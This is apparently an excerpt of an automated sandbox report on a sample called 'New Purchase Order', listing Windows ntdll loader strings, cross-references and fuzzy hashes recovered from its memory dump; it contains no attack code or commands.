                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          Strings
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018999ED
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01899A01
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01899A2A
                                                          • apphelp.dll, xrefs: 01836496
                                                          • LdrpInitShimEngine, xrefs: 018999F4, 01899A07, 01899A30
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01899A11, 01899A3A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          Strings
                                                          • LdrpInitializeProcess, xrefs: 0187C6C4
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 018B8181, 018B81F5
                                                          • Loading import redirection DLL: '%wZ', xrefs: 018B8170
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0187C6C3
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 018B81E5
                                                          • LdrpInitializeImportRedirection, xrefs: 018B8177, 018B81EB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018B21BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 018B2165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018B2178
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018B2180
                                                          • RtlGetAssemblyStorageRoot, xrefs: 018B2160, 018B219A, 018B21BA
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018B219F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          APIs
                                                            • Part of subcall function 01882DF0: LdrInitializeThunk.NTDLL ref: 01882DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01880D74
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          Strings
                                                          • LdrpInitializeProcess, xrefs: 01878422
                                                          • @, xrefs: 01878591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01878421
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0187855E
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018B22B6
                                                          • SXS: %s() passed the empty activation context, xrefs: 018B21DE
                                                          • .Local, xrefs: 018728D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018B21D9, 018B22B1
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          Strings
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018B342A
                                                          • RtlDeactivateActivationContext, xrefs: 018B3425, 018B3432, 018B3451
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018B3437
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018B3456
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018A0FE5
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018A10AE
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018A106B
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018A1028
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          Strings
                                                          • apphelp.dll, xrefs: 01862462
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018AA9A2
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018AA992
                                                          • LdrpDynamicShimModule, xrefs: 018AA998
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          Strings
                                                          • HEAP[%wZ]: , xrefs: 01853255
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0185327D
                                                          • HEAP: , xrefs: 01853264
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          Strings
                                                          • LdrpCheckModule, xrefs: 018AA117
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018AA121
                                                          • Failed to allocated memory for shimmed module list, xrefs: 018AA10F
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 018B82DE
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018B82E8
                                                          • Failed to reallocate the system dirs string !, xrefs: 018B82D7
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          Strings
                                                          • @, xrefs: 018FC1F1
                                                          • PreferredUILanguages, xrefs: 018FC212
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018FC1C5
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 018C4899
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018C4888
                                                          • LdrpCheckRedirection, xrefs: 018C488F
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 018C20F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018C2104
                                                          • LdrpInitializationFailure, xrefs: 018C20FA
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0184AA13
                                                          • LdrResSearchResource Exit, xrefs: 0184AA25
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: 71769a382247177952bc7c6a250f52d495b5c5f234f643758fdc70481ffcbb0a
                                                          • Instruction ID: 69a864489c6b579b9778769feeecaed501f96bcc2323670fbfd3bf7219c942ae
                                                          • Opcode Fuzzy Hash: 71769a382247177952bc7c6a250f52d495b5c5f234f643758fdc70481ffcbb0a
                                                          • Instruction Fuzzy Hash: E1E17371A4061D9FEB25CE9DC980BAEBBBAFF44354F144429E902EB251DB349B40CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: e3ceca87d8b61a89178df8a1329139f4be605d82eb309d31253725371b61a996
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 3DC1BF312043429FE726CE28C841B6BBBE9AFD4719F044A2CF69ACB2D1D775D545CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: d44e1082e5dce23f08debfce05c043aba3d08f81155f2e65b03cfea4c52a849b
                                                          • Instruction ID: 5acfeaa6f5013f40090bccf9ace0bd895a24dc87a715f15819ab2778836d102b
                                                          • Opcode Fuzzy Hash: d44e1082e5dce23f08debfce05c043aba3d08f81155f2e65b03cfea4c52a849b
                                                          • Instruction Fuzzy Hash: F2614C71E006199FDB25DFA8C980BEEBBB5FB48704F14806DE659EB351D731AA40CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: 6f085577261dd3bacc940db39a0e3874287a4a33d29c4d7599c3642285825e10
                                                          • Instruction ID: 204872e8fc4def3dd05ba876d3cb97ffcda96309d1ba0543c1e4c8bf96437aa0
                                                          • Opcode Fuzzy Hash: 6f085577261dd3bacc940db39a0e3874287a4a33d29c4d7599c3642285825e10
                                                          • Instruction Fuzzy Hash: 4051F771E0121EAFDB11DFA9CC84AEEBBF9EB45754F100529EA15F7290D6309A05CB60
                                                          Strings
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0184063D
                                                          • kLsE, xrefs: 01840540
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 1cb0102b5545850ccdad7511ce0992e43a19df8bc588ad30f51d35c280353f2e
                                                          • Instruction ID: 2393efc8122f2c049fa9d39a2637ec1d4dad2dd0773e0cb97cf5563bde09564c
                                                          • Opcode Fuzzy Hash: 1cb0102b5545850ccdad7511ce0992e43a19df8bc588ad30f51d35c280353f2e
                                                          • Instruction Fuzzy Hash: B0519C7150474A9BD724EF68C5406E7BBE8AF84304F10883EFAEAC7241EB74D645CB92
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0184A2FB
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0184A309
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: f3e05f07e3671718129d0e13a9b908362ca3179f2cbd5a340bed86be153ccb41
                                                          • Instruction ID: f587120a34f7867b5772732b8866421255a593b00b800bd7691eefceeee0af5c
                                                          • Opcode Fuzzy Hash: f3e05f07e3671718129d0e13a9b908362ca3179f2cbd5a340bed86be153ccb41
                                                          • Instruction Fuzzy Hash: 8941CD31A40649CBEB29CF6DC840B6ABBB5FF85704F1440A9E902DF291EBB5DB01CB41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: 00e4719cec83ade5385f581e810b903e444ad64f3759bfa5b25f98278eeabe02
                                                          • Instruction ID: 951b85cef8f9c04b8779fa3a0e01225f42342d5c43aa7f58a367e98ad117fe03
                                                          • Opcode Fuzzy Hash: 00e4719cec83ade5385f581e810b903e444ad64f3759bfa5b25f98278eeabe02
                                                          • Instruction Fuzzy Hash: 4401D1B2244704AFD311DF14CD45B1A77E8E785B19F048939A648C7190E334DA04DB46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 45ce78b2bafcec0ec4ad45d569a73bfbfcdb3e528f5d9bd2d1e98247a628f843
                                                          • Instruction ID: eb2db26338ec1c920e179240a1be41ab5426ca08f2003d4022cf706484de1b16
                                                          • Opcode Fuzzy Hash: 45ce78b2bafcec0ec4ad45d569a73bfbfcdb3e528f5d9bd2d1e98247a628f843
                                                          • Instruction Fuzzy Hash: CC828B75E0121C8FEB24CFA9C880BEDBBB5BF58314F14816AD959EB351EB709A41CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: d0ee4beabf11f79d3a164bcab93870e7d59270f8cd648a98db7b4b50b310c168
                                                          • Instruction ID: 7e697ca9d812f7ee8efd5868a290ccc503b4ddfa48e05b9a085fffe11ce6192a
                                                          • Opcode Fuzzy Hash: d0ee4beabf11f79d3a164bcab93870e7d59270f8cd648a98db7b4b50b310c168
                                                          • Instruction Fuzzy Hash: 19916271900219AFDB21DB99CD85FAEBBB8EF14B50F204069F605EB291E774EE04CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: ed97d2e3b7017cdb665082e8fcaedf5d3e1317183315f76878957e5c7392850c
                                                          • Instruction ID: 016ef1034badd6a929fdfe4d159b9b4c3bb563707f349c308fe1f87514a72a47
                                                          • Opcode Fuzzy Hash: ed97d2e3b7017cdb665082e8fcaedf5d3e1317183315f76878957e5c7392850c
                                                          • Instruction Fuzzy Hash: 2891803290064ABFDB22AFA9DC48FAFBBB9EF46744F140015F905E7251E7749A01CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: d21248043ff0d29372cbf7ee1c9777d7340cc9dc8b1776a7268f734e8d30f593
                                                          • Instruction ID: 3a3d1582eaaef2016457dbe6543d477f00a414b0cad09a6ed89c2b65a5f013ee
                                                          • Opcode Fuzzy Hash: d21248043ff0d29372cbf7ee1c9777d7340cc9dc8b1776a7268f734e8d30f593
                                                          • Instruction Fuzzy Hash: 777139B5E0021A9BDF28CF9CD590AEDBBB2BF58714F24812AE905E7341E7319A41CB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: 8e0d570f8326c7ecd4a09b67834c8211f0bf9acaf2a977ed150b7d4eb9db6d67
                                                          • Instruction ID: e4c5cd4aeace5ccb624af2a75acc112019d1b3a2da79624d5cfbf9b5bc1b177b
                                                          • Opcode Fuzzy Hash: 8e0d570f8326c7ecd4a09b67834c8211f0bf9acaf2a977ed150b7d4eb9db6d67
                                                          • Instruction Fuzzy Hash: FD519372D002299BDF10DF9DD848AAEBBF5AF46714F05412DEA15FB310D7349A01CBA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: e04c4a9f33f79df51cf58127304fec89edd45dd2b54edb2875498d886fa5ecc9
                                                          • Instruction ID: 4c8353339feae2910541a0e9d9d341c150eea021b3020dcf7d360e301ec2be0d
                                                          • Opcode Fuzzy Hash: e04c4a9f33f79df51cf58127304fec89edd45dd2b54edb2875498d886fa5ecc9
                                                          • Instruction Fuzzy Hash: B4415C725083069BD761DA79CC80B6BFBE8EF88718F44092DBA84D7140E674DB0887A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 99f16dfac51e63f2a176386d4affd4d0fd883fa653039b3bbbda78175fe0aff6
                                                          • Instruction ID: 272325afaf5a291d8af3e0d88e6c046629e00a4372f2d1f6bafc8b2e37d10c0f
                                                          • Opcode Fuzzy Hash: 99f16dfac51e63f2a176386d4affd4d0fd883fa653039b3bbbda78175fe0aff6
                                                          • Instruction Fuzzy Hash: DE4141B2D0112DABDB21DA54CC84FDEB77CAB45714F0045A5EA08EB241DB709F898FA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 224253fe89a8fb57646308c30ec170626c2ee97992906746a71d8b7d95426a81
                                                          • Instruction ID: 5f6f3cf8b7b879b350b5ad46464ddad2a1b5fb2974b767cea5a4be26054bc783
                                                          • Opcode Fuzzy Hash: 224253fe89a8fb57646308c30ec170626c2ee97992906746a71d8b7d95426a81
                                                          • Instruction Fuzzy Hash: 4C310931A0075D9BEB22DF6DC850BEE7BB8EF15704F244028E941EB282E775EA05CB50
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018C895E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: 78068f0de39eb16c0cff0c2b947cc73a77522a6e682d691378b4c2194e33d627
                                                          • Instruction ID: aa02e180a6ae1d1213b6493780612f484e399f15341e3f9ae4950b6003b1033f
                                                          • Opcode Fuzzy Hash: 78068f0de39eb16c0cff0c2b947cc73a77522a6e682d691378b4c2194e33d627
                                                          • Instruction Fuzzy Hash: 540142322402059BE620AB598884ADA7B60EFC6B54B05002CF64682521CF30EE88C7A3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3ddb224e2c35c6a95eb7156857d90c74fc2cbf6d79234613283277ada807907
                                                          • Instruction ID: 2c04dcac97730c8174c92814018ba8e947e1cfa0b3ebfe81964f8259b97217bd
                                                          • Opcode Fuzzy Hash: e3ddb224e2c35c6a95eb7156857d90c74fc2cbf6d79234613283277ada807907
                                                          • Instruction Fuzzy Hash: 82D1D371A0020A9BDF15DF68D880EBA77A5BF95308F08462DF916DB281E734EB54CBD1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: 817d06c0f5e2cc9c144ae5f53fe3a6080122157aecde3e68f8ca5afc44f20289
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 90B1A474A40609AFDF24DF98C944EABBBBAFF85704F10445EAA42D7790DA74EA05CB10
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: e9b9570e0ebecd7f496210eea52f99fcd933c3d889845dbb88a14e4fb306cb30
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 09B1F73160064A9FEB15DBA8C850BBEBBF6EF44304F184569EA52E7281D770DF41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0dc2c42558b1d5de09085ada7521510d27ce17a80aa61032dd777bc5566f1b6
                                                          • Instruction ID: ff7c8857e1f17d79a54da04f31144140224f33e744352534394fd52f181068bb
                                                          • Opcode Fuzzy Hash: a0dc2c42558b1d5de09085ada7521510d27ce17a80aa61032dd777bc5566f1b6
                                                          • Instruction Fuzzy Hash: 6EC159746083458FE764CF59C484BABB7E5BF88304F44495DE989C7291DB74EA04CF92
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
